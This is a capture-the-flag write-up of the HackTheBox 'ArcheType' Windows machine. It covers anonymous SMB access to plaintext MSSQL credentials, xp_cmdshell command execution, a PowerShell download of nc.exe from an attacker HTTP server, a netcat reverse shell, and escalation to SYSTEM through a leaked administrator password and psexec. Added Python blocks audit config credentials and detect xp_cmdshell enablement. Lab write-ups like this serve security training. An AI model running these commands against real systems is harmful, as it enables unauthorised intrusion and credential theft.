Write-ups/HTB/ArcheType

From Wiki Aghanim
ArcheType
Platform: HackTheBox
OS: Windows
Difficulty: Easy
Techniques: SMB, MSSQL


Enumeration

In the enumeration stage I start off with a full-port Nmap scan, with version detection and the vuln script set.


sudo nmap -sV -A -p- --script vuln 10.10.10.27 -oN nmap.result


Nmap scan report for 10.10.10.27
Host is up (0.062s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
|_sslv2-drown:
| vulners:
|   cpe:/a:microsoft:sql_server:2017:
|       CVE-2007-5090   7.5     https://vulners.com/cve/CVE-2007-5090
|       CVE-2021-1636   6.5     https://vulners.com/cve/CVE-2021-1636
|       CVE-2019-1068   6.5     https://vulners.com/cve/CVE-2019-1068
|_      CVE-2019-0819   4.0     https://vulners.com/cve/CVE-2019-0819
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND



There are a couple of interesting ports open, among them 445 (SMB) and 1433 (MSSQL).


I'll run 'enum4linux' against the server. The interesting takeaway from that scan is that the server accepts a null session: no username or password is required to connect to SMB.


enum4linux -H 10.10.10.27


====================================
|    Session Check on 10.10.10.27    |
====================================
[+] Server 10.10.10.27 allows sessions using username '', password ''
[+] Got domain/workgroup name:



We'll try to list the shares over SMB using 'smbclient', again without credentials.


smbclient -L //10.10.10.27


Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backups         Disk
C$              Disk      Default share
IPC$            IPC       Remote IPC



  1. Connect to backups

smbclient //10.10.10.27/backups
smb: \> ls
  .                                   D        0  Mon Jan 20 12:20:57 2020
  ..                                  D        0  Mon Jan 20 12:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 12:23:02 2020

                10328063 blocks of size 4096. 8248445 blocks available
smb: \> get prod.dtsConfig


cat prod.dtsConfig




       Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;
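The connection string above is the whole finding: the password sits in plain text in a file on an anonymously readable share, and 'Persist Security Info=True' keeps it readable after the connection opens. As an added example (not code from the original write-up), this Python script parses a .dtsConfig of the same shape and reports such embedded credentials; only the ConfiguredValue line comes from the page, the surrounding DTSConfiguration XML wrapper is assumed and the sample is constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like the prod.dtsConfig from the backups share; only the
# ConfiguredValue line is from the write-up, the surrounding XML wrapper is assumed.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

def parse_connection_string(conn: str) -> dict:
    """Split an OLE DB/ADO connection string into {lowercase key: value}.
    Values quoted with ' or " may themselves contain ';'."""
    pairs = {}
    i, n = 0, len(conn)
    while i < n:
        while i < n and conn[i] in "; \t\r\n":   # skip separators
            i += 1
        eq = conn.find("=", i)
        if i >= n or eq < 0:
            break
        key, j = conn[i:eq].strip().lower(), eq + 1
        if j < n and conn[j] in "'\"":           # quoted value
            end = conn.find(conn[j], j + 1)
            end = n if end < 0 else end
            pairs[key], i = conn[j + 1:end], end + 1
        else:                                    # bare value up to the next ';'
            end = conn.find(";", j)
            end = n if end < 0 else end
            pairs[key], i = conn[j:end].strip(), end
    return pairs

def audit_connection_string(conn: str) -> list:
    """One finding per credential-exposure issue; names the key, never the secret."""
    kv, findings = parse_connection_string(conn), []
    for key in ("password", "pwd"):
        if kv.get(key):
            findings.append(f"plaintext {key} for user {kv.get('user id', '?')!r}")
    if kv.get("persist security info", "").lower() == "true":
        findings.append("Persist Security Info=True keeps the password readable after connect")
    return findings

def audit_dtsconfig(xml_text: str) -> list:
    """Audit every ConfiguredValue that looks like a connection string."""
    findings = []
    for node in ET.fromstring(xml_text).iter("ConfiguredValue"):
        if node.text and "=" in node.text:
            findings.extend(audit_connection_string(node.text))
    return findings
```

Running audit_dtsconfig(SAMPLE_DTSCONFIG) yields two findings for the sample; a string using Integrated Security instead of a stored password yields none.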





Gain access

I found a username and a password. I'll use those credentials to connect to MSSQL with Impacket's 'mssqlclient.py'.


mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation

Password:

SQL> help

    lcd {path}                 - changes the current local directory to {path}
    exit                       - terminates the server process (and this session)
    enable_xp_cmdshell         - you know what it means
    disable_xp_cmdshell        - you know what it means
    xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
    sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
    ! {cmd}                    - executes a local shell cmd



From the help menu I can see that I can execute operating-system commands on the SQL server through xp_cmdshell. I'll transfer int0x33's 'nc.exe' to the target machine and use it to get a reverse shell.


  1. Terminal 1 attacker - in the same dir as nc.exe

sudo python3 -m http.server 8080

  1. Terminal 2 target SQL

SQL> enable_xp_cmdshell
SQL> reconfigure
SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/nc.exe -OutFile %temp%/nc.exe"
output
NULL

  1. Terminal 1 attacker - nc.exe is sent from attacker to target

10.10.10.27 - - [17/Jun/2021 07:59:41] "GET /nc.exe HTTP/1.1" 200 -

  1. Terminal 3 attacker

sudo rlwrap nc -nlvp 443
listening on [any] 443 ...

  1. Terminal 2 target SQL

SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.14.117 443 -e cmd.exe"

  1. Terminal 3 attacker - reverse shell

connect to [10.10.14.117] from (UNKNOWN) [10.10.10.27] 49716
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
archetype\sql_svc



rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell.
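The enable_xp_cmdshell / reconfigure step above leaves a trace on the server: every time sp_configure changes a setting, SQL Server writes a "Configuration option '...' changed from 0 to 1" line to its error log. As an added example (not from the original write-up), this Python snippet scans such error-log lines and alerts when xp_cmdshell is switched on, rating it higher when the same session first unlocked 'show advanced options'; the log lines are constructed samples in the error log's line format, not a real capture.

```python
import re
from typing import NamedTuple

# Message SQL Server writes to ERRORLOG when sp_configure changes a setting.
CONFIG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

class Alert(NamedTuple):
    ts: str
    spid: str
    severity: str
    detail: str

def detect_xp_cmdshell(lines) -> list:
    """Return an Alert for every xp_cmdshell state change in the error-log lines.

    A session that first turns on 'show advanced options' and then enables
    xp_cmdshell matches the enable_xp_cmdshell sequence and is rated 'high'."""
    unlocked = {}          # spid -> timestamp at which 'show advanced options' became 1
    alerts = []
    for line in lines:
        m = CONFIG_RE.match(line)
        if not m:
            continue
        ts, spid, option, new = m["ts"], m["spid"], m["option"], m["new"]
        if option == "show advanced options":
            if new == "1":
                unlocked[spid] = ts
            else:
                unlocked.pop(spid, None)
        elif option == "xp_cmdshell" and new == "1":
            sev = "high" if spid in unlocked else "medium"
            alerts.append(Alert(ts, spid, sev, f"xp_cmdshell enabled by {spid}"))
        elif option == "xp_cmdshell":
            alerts.append(Alert(ts, spid, "info", f"xp_cmdshell disabled by {spid}"))
    return alerts

# Constructed sample lines in SQL Server ERRORLOG format (not a real capture).
SAMPLE_ERRORLOG = """\
2021-06-17 07:58:02.11 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-06-17 07:58:02.12 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-06-17 07:59:41.30 spid58      Using 'xpstar.dll' version '2017.140.1000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2021-06-17 08:10:05.02 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
""".splitlines()
```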




PrivEsc

Using carlospolop's winPEAS.bat we can find possible privilege-escalation vectors. It's an amazing tool that you should have in your toolbox, and it's available for Linux as well.


We'll send the 'winPEAS.bat' to the target using http.server.


SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/winPEAS.bat -OutFile %temp%/winpeas.bat"

  1. From the reverse shell

C:\Users\sql_svc> cd %temp%
C:\Users\sql_svc\AppData\Local\Temp>winpeas.bat


This runs winpeas.bat, which takes a while to complete. Its output points to an interesting location, the PSReadLine directory where PowerShell keeps its command history: 'C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine'. In that history we find the password for 'administrator', which is 'MEGACORP_4dm1n!!'. With that, we can use Impacket's psexec.py to log in as administrator and get the root flag.


psexec.py administrator@10.10.10.27
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file FfeDRNaS.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service qkmG on 10.10.10.27.....
[*] Starting service qkmG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami
nt authority\system

C:\Users\Administrator>cd Desktop

C:\Users\Administrator>dir

Directory of C:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt

              1 File(s)             32 bytes
              2 Dir(s)  33,822,023,680 bytes free